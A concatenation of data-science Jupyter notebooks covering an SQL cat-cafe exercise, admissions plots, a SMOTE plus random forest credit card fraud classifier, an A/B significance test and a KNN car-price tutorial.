cursor.execute("SELECT name FROM cat WHERE birthdate = %s", [birthdate])
print(cursor.fetchone()[0])
###Output
Scaredy
###Markdown
In which zip codes can I find a lilac-colored tabby?Expected output: 11237, 11215
###Code
conn.rollback()
cursor.execute("""SELECT DISTINCT(cafe.zip)
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat.color = 'lilac' AND cat.pattern = 'tabby' AND cat_cafe.active = true
""")
print(', '.join([x[0] for x in cursor.fetchall()]))
###Output
11237, 11215
###Markdown
What's the average weight of cats currently residing at all locations?Expected output:```Independent Claws: 9.33Paws and Play: 9.28Tall Tails: 9.82Hang In There: 9.25Cats Meow: 9.76```
###Code
conn.rollback()
cursor.execute("""
SELECT cafe.name, avg(cat.weight)
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat_cafe.active = True
GROUP BY cafe.name
""")
for rec in cursor.fetchall():
print(rec[0]+":", "%0.2f" % rec[1])
###Output
Hang In There: 9.25
Independent Claws: 9.33
Paws and Play: 9.28
Tall Tails: 9.82
Cats Meow: 9.75
###Markdown
Which location has the most cats with tortoiseshell coats?Expected output: `Independent Claws`
###Code
conn.rollback()
cursor.execute("""
SELECT cafe.name
FROM cat
JOIN cat_cafe ON cat.id = cat_cafe.catid
JOIN cafe ON cafe.id = cat_cafe.cafeid
WHERE cat_cafe.active = true AND cat.pattern = 'tortoiseshell'
GROUP BY cafe.name
ORDER BY count(cat.name) DESC
LIMIT 1
""")
print(cursor.fetchone()[0])
###Output
Independent Claws
|
Data_visualization_seaborn_matplotlin.ipynb | ###Markdown
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
df = pd.read_csv('Admission_Predict_Ver1.1.csv')
data = df
df.head()
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='GRE Score',data=df);
sns.relplot(x='GRE Score', y='Chance of Admit ', hue='CGPA', kind="line", data=df);
def category(x):
if x < 0.80:
return 'less'
else:
return 'high'
df['Chance'] = df['Chance of Admit '].apply(category)
data = data.drop(columns=['Serial No.','Chance'])
data
sns.countplot(x='Chance', data=df, hue='University Rating')
sns.heatmap(data)
data.plot.box()
df['University Rating'].unique()
plt.pie(df['Chance of Admit '], autopct ='% 1.1f %%', shadow = True)
###Output
_____no_output_____ |
credit-card-fraud-prediction-rf-smote.ipynb | ###Markdown
Welcome to my exploration of Credit Card fraud!In this kernel I will do some explorations trying to understand the fraud transaction patterns and them I will implement some models of machine learning.I will implement technique an technique called SMOTE, supervised models, supervised learning algorithms. Introduction to DatasetThe datasets contains transactions made by credit cards in September 2013 by european cardholders. This dataset presents transactions that occurred in two days, where we have 492 frauds out of 284,807 transactions. The dataset is highly unbalanced, the positive class (frauds) account for 0.172% of all transactions.It contains only numerical input variables which are the result of a PCA transformation. Unfortunately, due to confidentiality issues, we cannot provide the original features and more background information about the data. Features V1, V2, ... V28 are the principal components obtained with PCA, the only features which have not been transformed with PCA are 'Time' and 'Amount'. Feature 'Time' contains the seconds elapsed between each transaction and the first transaction in the dataset. The feature 'Amount' is the transaction Amount, this feature can be used for example-dependant cost-senstive learning. Feature 'Class' is the response variable and it takes value 1 in case of fraud and 0 otherwise.Given the class imbalance ratio, we recommend measuring the accuracy using the Area Under the Precision-Recall Curve (AUPRC). Confusion matrix accuracy is not meaningful for unbalanced classification.The dataset has been collected and analysed during a research collaboration of Worldline and the Machine Learning Group (http://mlg.ulb.ac.be) of ULB (Université Libre de Bruxelles) on big data mining and fraud detection. More details on current and past projects on related topics are available on http://mlg.ulb.ac.be/BruFence and http://mlg.ulb.ac.be/ARTML) Let's start importing the librarys and looking the data
###Code
import pandas as pd #To hand with data
import numpy as np #To math
import seaborn as sns #to visualization
import matplotlib.pyplot as plt # to plot the graphs
import matplotlib.gridspec as gridspec # to do the grid of plots
#loading the data
df_credit = pd.read_csv("C:/Users/Lenovo/Desktop/creditcard.csv")
#looking the how data looks
df_credit.head()
#looking the type and searching for null values
df_credit.info()
# The data is stardarized, I will explore them later
#For now I will look the "normal" columns
df_credit[["Time","Amount","Class"]].describe()
###Output
_____no_output_____
###Markdown
Firstly, I will explore through 3 different columns:- Time- Amount- Class
###Code
#Lets start looking the difference by Normal and Fraud transactions
print("Distribuition of Normal(0) and Frauds(1): ")
print(df_credit["Class"].value_counts())
LABELS = ["Normal", "Fraud"]
plt.figure(figsize=(7,5))
sns.countplot(df_credit['Class'])
plt.xticks(range(2), LABELS)
plt.title("Class Count", fontsize=18)
plt.xlabel("Is fraud?", fontsize=15)
plt.ylabel("Count", fontsize=15)
plt.show()
###Output
Distribuition of Normal(0) and Frauds(1):
0 284315
1 492
Name: Class, dtype: int64
###Markdown
We have a clearly imbalanced data.It's very common when treating of frauds... First I will do some explore through the Time and Amount. Second I will explore the V's Features, that are PCA's Time Features and some Feature EngineeringAs our Time feature are in seconds we will transform it ot minutes and hours to get a better understand of the patterns
###Code
timedelta = pd.to_timedelta(df_credit['Time'], unit='s')
df_credit['Time_min'] = (timedelta.dt.components.minutes).astype(int)
df_credit['Time_hour'] = (timedelta.dt.components.hours).astype(int)
#Exploring the distribuition by Class types throught hours and minutes
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_hour"],
color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_hour"],
color='r')
plt.title('Fraud x Normal Transactions by Hours', fontsize=17)
plt.xlim([-1,25])
plt.show()
#Exploring the distribuition by Class types throught hours and minutes
plt.figure(figsize=(12,5))
sns.distplot(df_credit[df_credit['Class'] == 0]["Time_min"],
color='g')
sns.distplot(df_credit[df_credit['Class'] == 1]["Time_min"],
color='r')
plt.title('Fraud x Normal Transactions by minutes', fontsize=17)
plt.xlim([-1,61])
plt.show()
###Output
_____no_output_____
###Markdown
- Interesting distribuition, but don't sounds like a clear pattern of action Looking the statistics of our Amount class frauds and normal transactions
###Code
#To clearly the data of frauds and no frauds
df_fraud = df_credit[df_credit['Class'] == 1]
df_normal = df_credit[df_credit['Class'] == 0]
print("Fraud transaction statistics")
print(df_fraud["Amount"].describe())
print("\nNormal transaction statistics")
print(df_normal["Amount"].describe())
df_fraud.shape
df_normal.shape
###Output
_____no_output_____
###Markdown
Interesting. Using this informations I will filter the values to look for Amount by Class I will filter the "normal" amounts by 3.000
###Code
#Feature engineering to a better visualization of the values
df_credit['Amount_log'] = np.log(df_credit.Amount + 0.01)
plt.figure(figsize=(14,6))
#I will explore the Amount by Class and see the distribuition of Amount transactions
plt.subplot(121)
ax = sns.boxplot(x ="Class",y="Amount",
data=df_credit)
ax.set_title("Class x Amount", fontsize=20)
ax.set_xlabel("Is Fraud?", fontsize=16)
ax.set_ylabel("Amount(US)", fontsize = 16)
plt.subplot(122)
ax1 = sns.boxplot(x ="Class",y="Amount_log", data=df_credit)
ax1.set_title("Class x Amount", fontsize=20)
ax1.set_xlabel("Is Fraud?", fontsize=16)
ax1.set_ylabel("Amount(Log)", fontsize = 16)
plt.subplots_adjust(hspace = 0.6, top = 0.8)
plt.show()
###Output
_____no_output_____
###Markdown
We can see a slightly difference in log amount of our two Classes. The IQR of fraudulent transactions are higher than normal transactions, but normal transactions have highest values Looking a scatter plot of the Time_min distribuition by Amount
###Code
#Looking the Amount and time distribuition of FRAUD transactions
ax = sns.lmplot(y="Amount", x="Time_min", fit_reg=False,aspect=1.8,
data=df_credit, hue='Class')
plt.title("Amounts by Minutes of Frauds and Normal Transactions",fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
Looking a scatter plot of the Time_hour distribuition by Amount
###Code
ax = sns.lmplot(y="Amount", x="Time_hour", fit_reg=False,aspect=1.8,
data=df_credit, hue='Class')
plt.title("Amounts by Hour of Frauds and Normal Transactions", fontsize=16)
plt.show()
###Output
_____no_output_____
###Markdown
I will use boxplot to search differents distribuitions: - We are searching for features that diverges from normal distribuition
###Code
#Looking the V's features
columns = df_credit.iloc[:,1:29].columns
frauds = df_credit.Class == 1
normals = df_credit.Class == 0
grid = gridspec.GridSpec(14, 2)
plt.figure(figsize=(15,20*4))
for n, col in enumerate(df_credit[columns]):
ax = plt.subplot(grid[n])
sns.distplot(df_credit[col][frauds], bins = 50, color='g') #Will receive the "semi-salmon" violin
sns.distplot(df_credit[col][normals], bins = 50, color='r') #Will receive the "ocean" color
ax.set_ylabel('Density')
ax.set_title(str(col))
ax.set_xlabel('')
plt.show()
###Output
_____no_output_____
###Markdown
We can see a interesting different distribuition in some of our features like V4, V9, V16, V17 and a lot more. Now let's take a look on time distribuition Feature selections
###Code
#I will select the variables where fraud class have a interesting behavior and might can help us predict
df_credit = df_credit[["Time_hour","Time_min","V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount","Class"]]
###Output
_____no_output_____
###Markdown
Some Feature Engineering
###Code
df_credit.Amount = np.log(df_credit.Amount + 0.001)
#Looking the final df
df_credit.head()
colormap = plt.cm.Greens
plt.figure(figsize=(14,12))
sns.heatmap(df_credit.corr(),linewidths=0.1,vmax=1.0,
square=True, cmap = colormap, linecolor='white', annot=True)
plt.show()
###Output
_____no_output_____
###Markdown
Preprocessing
###Code
from imblearn.pipeline import make_pipeline as make_pipeline_imb # To do our transformation in a unique time
from imblearn.over_sampling import SMOTE
from sklearn.pipeline import make_pipeline
from imblearn.metrics import classification_report_imbalanced
from sklearn.model_selection import train_test_split
from collections import Counter
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import precision_score, recall_score, fbeta_score, confusion_matrix, precision_recall_curve, accuracy_score
X = df_credit.drop(["Class"], axis=1).values #Setting the X to do the split
y = df_credit["Class"].values # transforming the values in array
# the function that we will use to better evaluate the model
def print_results(headline, true_value, pred):
print(headline)
print("accuracy: {}".format(accuracy_score(true_value, pred)))
print("precision: {}".format(precision_score(true_value, pred)))
print("recall: {}".format(recall_score(true_value, pred)))
print("f2: {}".format(fbeta_score(true_value, pred, beta=2)))
# splitting data into training and test set
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=2, test_size=0.20)
classifier = RandomForestClassifier
# build model with SMOTE imblearn
smote_pipeline = make_pipeline_imb(SMOTE(random_state=4), \
classifier(random_state=42))
smote_model = smote_pipeline.fit(X_train, y_train)
smote_prediction = smote_model.predict(X_test)
#Showing the diference before and after the transformation used
print("normal data distribution: {}".format(Counter(y)))
X_smote, y_smote = SMOTE().fit_sample(X, y)
print("SMOTE data distribution: {}".format(Counter(y_smote)))
###Output
normal data distribution: Counter({0: 284315, 1: 492})
SMOTE data distribution: Counter({0: 284315, 1: 284315})
###Markdown
Evaluating the model SMOTE + Random Forest
###Code
print("Confusion Matrix: ")
print(confusion_matrix(y_test, smote_prediction))
conf_matrix=confusion_matrix(y_test, smote_prediction)
print('\nSMOTE Pipeline Score {}'.format(smote_pipeline.score(X_test, y_test)))
print_results("\nSMOTE + RandomForest classification", y_test, smote_prediction)
plt.figure(figsize=(10, 10))
sns.heatmap(conf_matrix, xticklabels=LABELS, yticklabels=LABELS, annot=True, fmt="d");
plt.title("Confusion matrix")
plt.ylabel('True class')
plt.xlabel('Predicted class')
plt.tight_layout()
# Compute predicted probabilities: y_pred_prob
y_pred_prob = smote_pipeline.predict_proba(X_test)[:,1]
# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)
# Plot ROC curve
plt.plot(precision, recall)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____
###Markdown
CONSIDERING ONLY RANDOM FOREST FOR COMPARING THE MODEL
###Code
# Running the fit
from sklearn.ensemble import RandomForestClassifier
rf = RandomForestClassifier(max_depth=5, max_features = 7, n_estimators = 10)
rf.fit(X_train, y_train)
# Printing the Training Score
print("Training score data: ")
print(rf.score(X_train, y_train))
#Testing the model
#Predicting by X_test
y_pred = rf.predict(X_test)
print(confusion_matrix(y_test, y_pred))
print_results("RF classification", y_test, y_pred)
###Output
[[56871 7]
[ 16 68]]
RF classification
accuracy: 0.9995962220427653
precision: 0.9066666666666666
recall: 0.8095238095238095
f2: 0.8272506082725061
###Markdown
Feature importance plot
###Code
features = ["Time_min", 'Time_hours',"V2","V3","V4","V9","V10","V11","V12","V14","V16","V17","V18","V19","V27","Amount"]
plt.figure(figsize = (9,5))
feat_import = pd.DataFrame({'Feature': features, 'Feature importance': rf.feature_importances_})
feat_import = feat_import.sort_values(by='Feature importance',ascending=False)
g = sns.barplot(x='Feature',y='Feature importance',data=feat_import)
g.set_xticklabels(g.get_xticklabels(),rotation=90)
g.set_title('Features importance - Random Forest',fontsize=20)
plt.show()
###Output
_____no_output_____
###Markdown
The top 4 feature are V17, V14, V12, V10 corresponds to 75% of total. Also the f2 score that is the median of recall and precision are on a considerably value
###Code
#Predicting proba
y_pred_prob = rf.predict_proba(X_test)[:,1]
# Generate precision recall curve values: precision, recall, thresholds
precision, recall, thresholds = precision_recall_curve(y_test, y_pred_prob)
# Plot ROC curve
plt.plot(precision, recall)
plt.xlabel('Recall')
plt.ylabel('Precision')
plt.title('Precision Recall Curve')
plt.show()
###Output
_____no_output_____ |
ABTesting/L2_Statistical_Significance_Solution.ipynb | ###Markdown
Practice: Statistical SignificanceLet's say that we've collected data for a web-based experiment. In the experiment, we're testing the change in layout of a product information page to see if this affects the proportion of people who click on a button to go to the download page. This experiment has been designed to have a cookie-based diversion, and we record two things from each user: which page version they received, and whether or not they accessed the download page during the data recording period. (We aren't keeping track of any other factors in this example, such as number of pageviews, or time between accessing the page and making the download, that might be of further interest.)Your objective in this notebook is to perform a statistical test on both recorded metrics to see if there is a statistical difference between the two groups.
###Code
# import packages
import numpy as np
import pandas as pd
import scipy.stats as stats
from statsmodels.stats import proportion as proptests
import matplotlib.pyplot as plt
% matplotlib inline
# import data
data = pd.read_csv('data/statistical_significance_data.csv')
data.head(10)
###Output
_____no_output_____
###Markdown
In the dataset, the 'condition' column takes a 0 for the control group, and 1 for the experimental group. The 'click' column takes a values of 0 for no click, and 1 for a click. Checking the Invariant MetricFirst of all, we should check that the number of visitors assigned to each group is similar. It's important to check the invariant metrics as a prerequisite so that our inferences on the evaluation metrics are founded on solid ground. If we find that the two groups are imbalanced on the invariant metric, then this will require us to look carefully at how the visitors were split so that any sources of bias are accounted for. It's possible that a statistically significant difference in an invariant metric will require us to revise random assignment procedures and re-do data collection.In this case, we want to do a two-sided hypothesis test on the proportion of visitors assigned to one of our conditions. Choosing the control or the experimental condition doesn't matter: you'll get the same result either way. Feel free to use whatever method you'd like: we'll highlight two main avenues below.If you want to take a simulation-based approach, you can simulate the number of visitors that would be assigned to each group for the number of total observations, assuming that we have an expected 50/50 split. Do this many times (200 000 repetitions should provide a good speed-variability balance in this case) and then see in how many simulated cases we get as extreme or more extreme a deviation from 50/50 that we actually observed. Don't forget that, since we have a two-sided test, an extreme case also includes values on the opposite side of 50/50. (e.g. Since simulated outcomes of .48 and lower are considered as being more extreme than an actual observation of 0.48, so too will simulated outcomes of .52 and higher.) The proportion of flagged simulation outcomes gives us a p-value on which to assess our observed proportion. We hope to see a larger p-value, insufficient evidence to reject the null hypothesis.If you want to take an analytic approach, you could use the exact binomial distribution to compute a p-value for the test. The more usual approach, however, is to use the normal distribution approximation. Recall that this is possible thanks to our large sample size and the central limit theorem. To get a precise p-value, you should also perform a continuity correction, either adding or subtracting 0.5 to the total count before computing the area underneath the curve. (e.g. If we had 415 / 850 assigned to the control group, then the normal approximation would take the area to the left of $(415 + 0.5) / 850 = 0.489$ and to the right of $(435 - 0.5) / 850 = 0.511$.)You can check your results by completing the quiz and watching the video following the workspace. You could also try using multiple approaches and seeing if they come up with similar outcomes! Analytic Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control
# Compute a z-score and p-value
p = 0.5
sd = np.sqrt(p * (1-p) * n_obs)
z = ((n_control + 0.5) - p * n_obs) / sd
print(z)
print(2 * stats.norm.cdf(z))
###Output
-0.506217597735
0.612703902554
###Markdown
Simulation Approach
###Code
# get number of trials and number of 'successes'
n_obs = data.shape[0]
n_control = data.groupby('condition').size()[0]
n_control
# # simulate outcomes under null, compare to observed outcome
p = 0.5
n_trials = 200_000
samples = np.random.binomial(n_obs, p, n_trials)
print(np.logical_or(samples <= n_control, samples >= (n_obs - n_control)).mean())
###Output
0.611725
###Markdown
Checking the Evaluation MetricAfter performing our checks on the invariant metric, we can move on to performing a hypothesis test on the evaluation metric: the click-through rate. In this case, we want to see that the experimental group has a significantly larger click-through rate than the control group, a one-tailed test.The simulation approach for this metric isn't too different from the approach for the invariant metric. You'll need the overall click-through rate as the common proportion to draw simulated values from for each group. You may also want to perform more simulations since there's higher variance for this test.There's a few analytic approaches possible here, but you'll probably make use of the normal approximation again in these cases. In addition to the pooled click-through rate, you'll need a pooled standard deviation in order to compute a z-score. While there is a continuity correction possible in this case as well, it's much more conservative than the p-value that a simulation will usually imply. Computing the z-score and resulting p-value without a continuity correction should be closer to the simulation's outcomes, though slightly more optimistic about there being a statistical difference between groups.As with the previous question, you'll find a quiz and video following the workspace for you to check your results.
###Code
p_click = data.groupby('condition').mean()['click']
p_click
p_click[1] - p_click[0]
###Output
_____no_output_____
###Markdown
Analytic Approach
###Code
# get number of trials and overall 'success' rate under null
n_control = data.groupby('condition').size()[0]
n_exper = data.groupby('condition').size()[1]
p_null = data['click'].mean()
# compute standard error, z-score, and p-value
se_p = np.sqrt(p_null * (1-p_null) * (1/n_control + 1/n_exper))
z = (p_click[1] - p_click[0]) / se_p
print(z)
print(1-stats.norm.cdf(z))
###Output
1.75718873962
0.0394428219746
###Markdown
Simulation Approach
###Code
# get number of trials and overall 'success' rate under null
n_control = data.groupby('condition').size()[0]
n_exper = data.groupby('condition').size()[1]
p_null = data['click'].mean()
# simulate outcomes under null, compare to observed outcome
n_trials = 200_000
ctrl_clicks = np.random.binomial(n_control, p_null, n_trials)
exp_clicks = np.random.binomial(n_exper, p_null, n_trials)
samples = exp_clicks / n_exper - ctrl_clicks / n_control
print((samples >= (p_click[1] - p_click[0])).mean())
###Output
0.039785
|
_notebooks/2021-12-21-Predicting-Car-Prices-K-Nearest-Neighbors.ipynb | ###Markdown
"Predicting Car Prices using the K Nearest Neighbors Algorithm"> "I use various machine learning workflow techniques to arrive at the optimal K Nearest Neighbors (KNN) regression model for predicting car prices."- author: Migs Germar- toc: true- branch: master- badges: true- comments: true- categories: [python, pandas, numpy, matplotlib, seaborn, scipy, sklearn]- hide: false- search_exclude: false- image: images/notebook-images/knn-car-prices/two-cars.jfif Wheelscene | Chris Smith IntroductionK Nearest Neighbors or KNN is an an algorithm that can make predictions based on the similarity between different observations. In this project, I used KNN to predict the price of a car based on how similar its features are to those of other cars. Towards this end, I applied various machine learning techniques, such as standardization, feature selection, train-test split, hyperparameter optimization, and k-fold cross validation. > Note: I wrote this notebook by following a guided project on the [Dataquest](https://www.dataquest.io/) platform, specifically the [Guided Project: Predicting Car Prices](https://app.dataquest.io/c/36/m/155/guided-project%3A-predicting-car-prices/1/introduction-to-the-data-set). The general project flow and research questions were guided by Dataquest. Furthermore, though the mathematical explanations in this post were written in my own words, I learned the theory from Dataquest. Below are the packages used in this project.
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import re
from scipy.stats import zscore
from sklearn.neighbors import KNeighborsRegressor
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.feature_selection import f_regression, SelectKBest
from sklearn.metrics import mean_squared_error
###Output
_____no_output_____
###Markdown
Data Inspection and CleaningThe dataset for this project is the Automobile Data Set by Schlimmer (1987), from the UCI Machine Learning Repository. The data and its description can be obtained [here](https://archive.ics.uci.edu/ml/datasets/automobile).The dataset describes 26 features of hundreds of cars. A summary of the features and their data types is shown below.
###Code
#collapse-hide
# Data dictionary from documentation.
data_dict = """1. symboling: -3, -2, -1, 0, 1, 2, 3.
2. normalized-losses: continuous from 65 to 256.
3. make:
alfa-romero, audi, bmw, chevrolet, dodge, honda,
isuzu, jaguar, mazda, mercedes-benz, mercury,
mitsubishi, nissan, peugot, plymouth, porsche,
renault, saab, subaru, toyota, volkswagen, volvo
4. fuel-type: diesel, gas.
5. aspiration: std, turbo.
6. num-of-doors: four, two.
7. body-style: hardtop, wagon, sedan, hatchback, convertible.
8. drive-wheels: 4wd, fwd, rwd.
9. engine-location: front, rear.
10. wheel-base: continuous from 86.6 120.9.
11. length: continuous from 141.1 to 208.1.
12. width: continuous from 60.3 to 72.3.
13. height: continuous from 47.8 to 59.8.
14. curb-weight: continuous from 1488 to 4066.
15. engine-type: dohc, dohcv, l, ohc, ohcf, ohcv, rotor.
16. num-of-cylinders: eight, five, four, six, three, twelve, two.
17. engine-size: continuous from 61 to 326.
18. fuel-system: 1bbl, 2bbl, 4bbl, idi, mfi, mpfi, spdi, spfi.
19. bore: continuous from 2.54 to 3.94.
20. stroke: continuous from 2.07 to 4.17.
21. compression-ratio: continuous from 7 to 23.
22. horsepower: continuous from 48 to 288.
23. peak-rpm: continuous from 4150 to 6600.
24. city-mpg: continuous from 13 to 49.
25. highway-mpg: continuous from 16 to 54.
26. price: continuous from 5118 to 45400."""
# Use regex to extract column names from data dictionary.
col_names = re.findall(
pattern = r"^[0-9]{1,2}\. ([a-z\-]+):",
string = data_dict,
# Use multiline flag so that ^ indicates the start of a line.
flags = re.MULTILINE,
)
# Read data file and add column names.
cars_df = pd.read_csv(
"./private/Car-Prices-KNN-Files/imports-85.data",
names = col_names,
)
cars_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 205 entries, 0 to 204
Data columns (total 26 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 symboling 205 non-null int64
1 normalized-losses 205 non-null object
2 make 205 non-null object
3 fuel-type 205 non-null object
4 aspiration 205 non-null object
5 num-of-doors 205 non-null object
6 body-style 205 non-null object
7 drive-wheels 205 non-null object
8 engine-location 205 non-null object
9 wheel-base 205 non-null float64
10 length 205 non-null float64
11 width 205 non-null float64
12 height 205 non-null float64
13 curb-weight 205 non-null int64
14 engine-type 205 non-null object
15 num-of-cylinders 205 non-null object
16 engine-size 205 non-null int64
17 fuel-system 205 non-null object
18 bore 205 non-null object
19 stroke 205 non-null object
20 compression-ratio 205 non-null float64
21 horsepower 205 non-null object
22 peak-rpm 205 non-null object
23 city-mpg 205 non-null int64
24 highway-mpg 205 non-null int64
25 price 205 non-null object
dtypes: float64(5), int64(5), object(16)
memory usage: 41.8+ KB
###Markdown
There are 205 cars and 26 features. Most of the features directly describe physical characteristics of the cars. Some exceptions are "symboling" and "normalized-losses", which are values related to car insurance and are beyond the scope of this project. Also, the "price" column provides the price of each car in USD.Let us look at the first five rows.
###Code
#collapse-hide
cars_df.head()
###Output
_____no_output_____
###Markdown
If we compare the data type of each column to its contents, several opportunities for data cleaning can be seen. For example, the "normalized-losses" feature is listed as an object-type column because it contains both strings and numbers. However, the strings in the column are question marks (?). Rather than being categories, these may be placeholders for missing data. This problem applies to several other columns, not just this one.Furthermore, in some columns like "num-of-doors", numbers are written as words. For example, 2 is written as "two". Since the numbers are in string format, these cannot be used in the K Nearest Neighbors model.Thus, in summary, the following cleaning steps have to be performed:- Replace question mark strings ("?") with null values (NaN). These are the proper way to indicate missing values.- Convert several object columns, like "normalized-losses", into numeric columns.- Replace numbers written as words with their proper numeric equivalents. For example, replace "four" with 4.These were performed in the following code cell.
###Code
#collapse-hide
# Clean the data.
# Replace ? with NaN since these are placeholders.
cars_df = cars_df.replace("?", np.nan)
# Change this object column to float type.
obj_to_numeric = [
"normalized-losses",
"bore",
"stroke",
"horsepower",
"peak-rpm",
"price",
]
for col in obj_to_numeric:
cars_df[col] = pd.to_numeric(cars_df[col], errors = "coerce")
# Replace strings with numeric equivalents.
cars_df["num-of-doors"] = cars_df["num-of-doors"].replace(
{
"four": 4.0,
"two": 2.0,
}
)
cars_df["num-of-cylinders"] = cars_df["num-of-cylinders"].replace(
{
"four": 4,
"six": 6,
"five": 5,
"eight": 8,
"two": 2,
"three": 3,
"twelve": 12,
}
)
cars_df.info()
###Output
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 205 entries, 0 to 204
Data columns (total 26 columns):
# Column Non-Null Count Dtype
--- ------ -------------- -----
0 symboling 205 non-null int64
1 normalized-losses 164 non-null float64
2 make 205 non-null object
3 fuel-type 205 non-null object
4 aspiration 205 non-null object
5 num-of-doors 203 non-null float64
6 body-style 205 non-null object
7 drive-wheels 205 non-null object
8 engine-location 205 non-null object
9 wheel-base 205 non-null float64
10 length 205 non-null float64
11 width 205 non-null float64
12 height 205 non-null float64
13 curb-weight 205 non-null int64
14 engine-type 205 non-null object
15 num-of-cylinders 205 non-null int64
16 engine-size 205 non-null int64
17 fuel-system 205 non-null object
18 bore 201 non-null float64
19 stroke 201 non-null float64
20 compression-ratio 205 non-null float64
21 horsepower 203 non-null float64
22 peak-rpm 203 non-null float64
23 city-mpg 205 non-null int64
24 highway-mpg 205 non-null int64
25 price 201 non-null float64
dtypes: float64(12), int64(6), object(8)
memory usage: 41.8+ KB
###Markdown
The new summary of columns is shown above. Several columns which were once "object" columns are now numeric. Also, since we replaced "?" placeholders with null values, we can now see that some columns have missing values.
###Code
#collapse-hide
null_percs = (
cars_df
.isnull()
.sum()
.divide(cars_df.shape[0])
.multiply(100)
)
null_percs.loc[null_percs > 0]
###Output
_____no_output_____
###Markdown
The table above shows the percentage of missing values in each column that has them. In particular, "normalized-losses" has missing values in 20% of the observations. Thus, we will have to drop this column from the dataset. This is better than the alternative, which is to delete all rows where "normalized-losses" is missing.As for the other 6 columns, we will use listwise deletion. This means that we will drop all rows with missing values in any of those columns.
###Code
#collapse-hide
cars_df = (
cars_df
.drop("normalized-losses", axis = 1)
.dropna(
subset = [
"num-of-doors",
"bore",
"stroke",
"horsepower",
"peak-rpm",
"price",
]
)
)
num_null = cars_df.isnull().sum().sum()
print(f"Total number of missing values: {num_null}")
print(f"New shape of dataset: {cars_df.shape}")
###Output
Total number of missing values: 0
New shape of dataset: (193, 25)
###Markdown
Now, there are no more missing values in the dataset. There are 193 rows and 25 columns left. The K Nearest Neighbors AlgorithmNext, I will discuss the theory behind the KNN algorithm, then implement it on the dataset.First, let us discuss basic terminology. For your reference, below is a small part of the dataset:
###Code
#collapse-hide
cars_df.loc[:5, ["make", "fuel-type", "num-of-doors", "body-style", "price"]]
###Output
_____no_output_____
###Markdown
Each row of data is called an observation; in this case, each observation is a car.On the other hand, each column is either a feature or a target. The target is the variable that we try to predict, and the features are information used to make the prediction. In the case of this project, the features may include the size of the car, the number of doors, etc. The target is the price of the car.The set of cars whose prices we will predict is called the testing set. On the other hand, the training set is the set of cars used to train the model to make predictions. Put more simply, in order to predict the price of a car in the testing set, we must compare it to the cars in the training set.In order to compare cars, KNN uses the Euclidean distance as a similarity metric between two observations. A low distance close to 0 means that the observations are very similar to each other. The following formula is used:$d = \sqrt{\sum_{i=1}^n (q_i - p_i)^2}$- $d$ is the Euclidean distance.- $n$ is the number of features.- $q$ and $p$ each refer to a different observation in the data. In this case, each is a different car. - $q_i$ is the value of feature $i$ for observation $q$. For example, if feature $1$ is the number of doors, $q_1$ is the number of doors on car $q$.- The differences between the two observations' features are squared, then summed up. Finally, the square root of the sum gives the Euclidean distance.Given that we want to predict the price of a car $q$, KNN computes the Euclidean distance of $q$ from *every single car in the training set*. The cars most similar to $q$ are its "nearest neighbors."We then choose a number $k$, which will determine how many of the nearest neighbors will be selected. For example, if $k = 5$, we select the five most similar cars. Then, we take the mean price of these five cars, and we predict that this is the price of car $q$.Since we make a prediction based on an observation's $k$ nearest neighbors, the algorithm is called K Nearest Neighbors. Note that what I have described is an example of a KNN regression model, as it predicts a numeric target. There are still several other forms of KNN. Some use a different similarity metric like Manhattan distance, and some perform classification, which means that they predict a categorical target (Miller, 2019). Techniques for ImplementationUnlike with my previous [post](https://miguelahg.github.io/mahg-data-science/python/pandas/numpy/matplotlib/scikit-learn/2021/12/14/Naive-Bayes-Algorithm-Detecting-Spam-Messages.html) on the Naive Bayes Algorithm, I will not be programming this algorithm manually. Instead, I will use the scikit-learn workflow, which involves pre-packaged machine learning functions.In this part, I will individually discuss certain important techniques used in the machine learning workflow. In the next part, I will combine these techniques in order to obtain the optimal KNN model. StandardizationThe first important technique is standardization. So that each feature will contribute equally to the Euclidean distance, we will standardize each numeric feature. In other words, each value will be converted into a z-score so that the mean of each feature is 0 and its standard deviation is 1. The following equation is used:$z = \frac{x - \bar{x}}{s}$- $z$ is the z-score.- $x$ is a value in a feature.- $\bar{x}$ is the mean of the feature.- $s$ is the sample standard deviation.
###Code
#collapse-hide
all_feature_cols = [col for col in cars_df.columns if col != "price"]
# Series of feature:data type
fdt = cars_df[all_feature_cols].dtypes
# Identify numeric features
all_numeric_features = fdt.index[fdt != "object"]
# Standardize
cars_df[all_numeric_features] = cars_df[all_numeric_features].apply(zscore, axis = 0, ddof = 1)
cars_df[all_numeric_features].head()
###Output
_____no_output_____
###Markdown
The table above shows the first 5 rows of all of the numeric features. Notice that each feature now contains positive and negative values close to 0 because it was standardized. Feature SelectionThe second technique is feature selection. We must choose features which we think are most relevant to a car's price. We can only select numeric features since categorical ones cannot be used to calculate Euclidean distance. Thus, we must select from the following features:
###Code
#collapse-hide
all_numeric_features.to_list()
###Output
_____no_output_____
###Markdown
